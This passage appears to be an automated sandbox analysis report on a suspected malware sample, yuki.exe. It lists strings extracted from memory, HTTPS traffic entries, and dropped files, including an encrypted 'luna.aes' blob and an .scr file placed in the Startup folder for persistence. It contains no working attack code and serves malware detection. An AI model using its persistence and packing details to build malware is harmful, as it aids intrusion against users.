Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
Source: yuki.exe, 00000001.00000003.1754446620.00000253A6C89000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754120068.00000253A6C89000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157252787.000001BE92D2A000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157380248.000001BE93227000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2161206638.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157471664.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2160722727.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2167827116.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2165826210.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2158897676.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2160028830.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2161884696.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2162631055.000001BE931C0000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157188229.000001BE93227000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157855506.000001BE931C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata
Source: ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues
Source: ? .scr, 00000011.00000003.2130094242.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblat
Source: yuki.exe, 00000000.00000003.1727675922.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/p
Source: yuki.exe, 00000000.00000003.1708452299.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-15924/ia/
Source: ? .scr, 00000011.00000003.2107145009.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-15924/ja/
Source: yuki.exe, 00000000.00000003.1712115450.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-15924/ka/
Source: ? .scr, 00000011.00000003.2113561071.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-15924/nb/
Source: yuki.exe, 00000000.00000003.1724401707.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-15924/pl/
Source: yuki.exe, 00000000.00000003.1725356033.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-15924/pt_BR/
Source: yuki.exe, 00000000.00000003.1726978112.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-15924/sc/
Source: ? .scr, 00000011.00000003.2126318795.000001DA7FA92000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2126318795.000001DA7FA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-15924/si/
Source: yuki.exe, 00000000.00000003.1731128332.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-15924/ta/
Source: yuki.exe, 00000000.00000003.1737174800.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-15924/zh_Hant_HK/
Source: iso3166-1.mo139.17.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/br/
Source: iso3166-1.mo142.17.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ca/
Source: iso3166-1.mo29.17.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/et/
Source: iso3166-1.mo40.17.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/fy/
Source: ? .scr, 00000011.00000003.2108870058.000001DA7FA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/kab/
Source: ? .scr, 00000011.00000003.2109167350.000001DA7FA90000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2109167350.000001DA7FA92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/kl/
Source: iso3166-1.mo75.17.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ky/
Source: ? .scr, 00000011.00000003.2111723284.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/mhr/
Source: yuki.exe, 00000000.00000003.1720602116.0000021E0C704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/mi/
Source: ? .scr, 00000011.00000003.2113160030.000001DA7FA92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/mt/
Source: ? .scr, 00000011.00000003.2113561071.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/nah/
Source: ? .scr, 00000011.00000003.2115473141.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/nv/
Source: ? .scr, 00000011.00000003.2117728006.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ps/
Source: yuki.exe, 00000000.00000003.1727675922.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/sk/
Source: yuki.exe, 00000000.00000003.1728605265.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/son/
Source: yuki.exe, 00000000.00000003.1730069070.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, iso3166-1.mo.0.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/sr/
Source: ? .scr, 00000011.00000003.2130094242.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/sv/
Source: ? .scr, 00000011.00000003.2131131213.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/sw/
Source: ? .scr, 00000011.00000003.2132532985.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/te/
Source: yuki.exe, 00000000.00000003.1731909290.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2132839671.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/th/
Source: yuki.exe, 00000000.00000003.1732300729.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2133229880.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmp, iso3166-1.mo149.17.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ti/
Source: ? .scr, 00000011.00000003.2133732428.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/tl/
Source: iso3166-1.mo14.0.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ug/
Source: ? .scr, 00000011.00000003.2135952422.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/uk/
Source: ? .scr, 00000011.00000003.2136916095.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ve/
Source: yuki.exe, 00000000.00000003.1736567539.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2138909975.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/yo/
Source: yuki.exe, 00000000.00000003.1737268242.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/zh_Hant_HK/
Source: yuki.exe, 00000000.00000003.1737899588.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, iso3166-1.mo53.0.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-1/zu/
Source: yuki.exe, 00000000.00000003.1707654129.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-2/hr/
Source: ? .scr, 00000011.00000003.2106133151.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-2/is/
Source: yuki.exe, 00000000.00000003.1714726870.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1714726870.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-2/kab/
Source: yuki.exe, 00000000.00000003.1718884771.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-2/ko/
Source: yuki.exe, 00000000.00000003.1719653463.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1719653463.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-2/ky/
Source: ? .scr, 00000011.00000003.2128937104.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-2/sr/
Source: yuki.exe, 00000000.00000003.1732810189.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-2/tr/
Source: iso3166-3.mo78.17.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-3/ar/
Source: iso3166-3.mo47.0.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-3/hi/
Source: yuki.exe, 00000000.00000003.1707654129.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-3/hr/
Source: ? .scr, 00000011.00000003.2106231691.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-3/is/
Source: yuki.exe, 00000000.00000003.1712841081.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-3/ka/
Source: yuki.exe, 00000000.00000003.1724233451.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1724233451.0000021E0C704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-3/pa_PK/
Source: yuki.exe, 00000000.00000003.1725526710.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-3/pt_BR/
Source: yuki.exe, 00000000.00000003.1727203822.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2125873023.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-3/sc/
Source: yuki.exe, 00000000.00000003.1728459172.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1728459172.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2128119645.000001DA7FA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-3/so/
Source: yuki.exe, 00000000.00000003.1731353019.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, iso3166-3.mo96.17.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-3/ta/
Source: ? .scr, 00000011.00000003.2139731319.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-3166-3/zh_Hant_HK/
Source: iso4217.mo31.0.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-4217/kab/
Source: ? .scr, 00000011.00000003.2125998712.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-4217/sc/
Source: yuki.exe, 00000000.00000003.1730281705.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2129777959.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-4217/sr/
Source: ? .scr, 00000011.00000003.2140348730.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-4217/zh_Hant/
Source: ? .scr, 00000011.00000003.2139949288.000001DA7FA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-4217/zh_Hant_HK/
Source: ? .scr, 00000011.00000003.2108870058.000001DA7FA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-3/kab/
Source: iso639-3.mo45.0.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-3/kmr/
Source: ? .scr, 00000011.00000003.2118299278.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-3/ps/
Source: ? .scr, 00000011.00000003.2125010242.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-3/ru/
Source: yuki.exe, 00000000.00000003.1729908012.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-3/sr/
Source: ? .scr, 00000011.00000003.2139470248.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-3/zh_Hans/
Source: yuki.exe, 00000000.00000003.1737899588.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, iso639-3.mo18.17.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-3/zh_Hant/
Source: ? .scr, 00000011.00000003.2140615605.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-3/zu/
Source: iso639-5.mo14.0.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-5/fr/
Source: yuki.exe, 00000000.00000003.1707868772.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, iso639-5.mo11.17.drString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-5/hr/
Source: ? .scr, 00000011.00000003.2105868793.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-5/id/
Source: ? .scr, 00000011.00000003.2111127311.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-5/lt/
Source: yuki.exe, 00000000.00000003.1722055616.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1722055616.0000021E0C704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-5/nb_NO/
Source: yuki.exe, 00000000.00000003.1724843721.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-5/pl/
Source: yuki.exe, 00000000.00000003.1726652753.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-5/ru/
Source: ? .scr, 00000011.00000003.2126318795.000001DA7FA92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-5/sc/
Source: yuki.exe, 00000000.00000003.1733324392.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-5/tr/
Source: ? .scr, 00000011.00000003.2136635297.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-5/uk/
Source: ? .scr, 00000011.00000003.2139949288.000001DA7FA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosted.weblate.org/projects/iso-codes/iso-639-5/zh_Hans/
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/
Source: yuki.exe, 00000001.00000003.1758691182.00000253A71C3000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2166874266.000001BE93582000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2167827116.000001BE930F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: powershell.exe, 00000007.00000002.1964129202.0000023910070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2411059467.000001B66759A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: ? .scr, 00000012.00000003.2165826210.000001BE931FB000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2167827116.000001BE931FB000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2162631055.000001BE931FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
Source: yuki.exe, 00000000.00000003.1726477105.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1727539431.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1725526710.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1730281705.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1720735281.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1725356033.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1731128332.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1726862514.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1732300729.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1725142698.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1733547239.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1714726870.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1722884588.0000021E0C704000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1733763570.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1736567539.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1721854004.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1728459172.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1722884588.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1722187201.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1724401707.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1726771310.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://salsa.debian.org/iso-codes-team/iso-codes/issues
Source: yuki.exe, 00000001.00000003.1754645986.00000253A6CAE000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754670946.00000253A6C5B000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754864261.00000253A6C62000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157730380.000001BE93249000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157831335.000001BE9325B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
Source: yuki.exe, 00000001.00000003.1754670946.00000253A6C5B000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754864261.00000253A6C62000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1755074427.00000253A6C3A000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157730380.000001BE93208000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2161342809.000001BE930C7000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2158897676.000001BE930C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: yuki.exe, 00000001.00000003.1754670946.00000253A6C5B000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754864261.00000253A6C62000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754617761.00000253A6CC7000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157730380.000001BE93249000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157800742.000001BE93262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;
Source: yuki.exe, 00000001.00000003.1754670946.00000253A6C5B000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754864261.00000253A6C62000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1754617761.00000253A6CC7000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157730380.000001BE93249000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2157800742.000001BE93262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;r
Source: ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
Source: ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
Source: yuki.exe, 00000001.00000003.1758691182.00000253A71C3000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1756576927.00000253A71C3000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1756576927.00000253A7184000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1759287643.00000253A7091000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1759088370.00000253A71E1000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2162550216.000001BE935F4000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2166420024.000001BE9368E000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2162550216.000001BE9365C000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2163284427.000001BE93691000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2164935398.000001BE9365C000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2164935398.000001BE9368E000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2163284427.000001BE9365C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
Source: yuki.exe, 00000000.00000003.1673233448.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
Source: yuki.exe, 00000000.00000003.1673233448.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1673205597.0000021E0C70D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: yuki.exe, 00000001.00000003.1758691182.00000253A71C3000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2166874266.000001BE93582000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2167827116.000001BE930F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54136
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54256
Source: unknownNetwork traffic detected: HTTP traffic on port 54169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\python312.dll entropy: 7.9935958549Jump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\sqlite3.dll entropy: 7.99327545133Jump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_ec_ws.pyd entropy: 7.99870484557Jump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imaging.cp312-win_amd64.pyd entropy: 7.99813744902Jump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\cryptography\hazmat\bindings\_rust.pyd entropy: 7.99962440624Jump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\cv2.pyd entropy: 7.99957832383Jump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\opencv_videoio_ffmpeg4100_64.dll entropy: 7.99997158125Jump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\luna.aes entropy: 7.99996042256Jump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr entropy: 7.99959017353Jump to dropped file
